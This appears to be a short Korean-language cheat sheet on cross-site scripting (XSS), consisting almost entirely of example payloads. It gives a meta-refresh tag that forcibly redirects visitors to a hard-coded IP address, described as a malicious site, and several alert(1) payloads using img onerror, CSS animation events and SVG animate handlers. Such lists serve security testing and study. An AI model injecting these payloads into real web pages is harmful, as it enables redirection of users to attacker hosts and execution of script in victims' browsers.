///
Search
📜

XSS

예시

<meta> tag를 활용한 악성 사이트 강제 이동
<meta http-equiv='refresh' content='0;url=http://34.64.247.148/'>
HTML
복사
<img> tag를 활용한 alert() 실행
<img src=# onerror="alert(1)"> <style>@keyframes x{}</style><img style="animation-name:x" onwebkitanimationstart="alert(1)"></img> <svg><animate onbegin=alert(1) attributeName=x dur=1s>
HTML
복사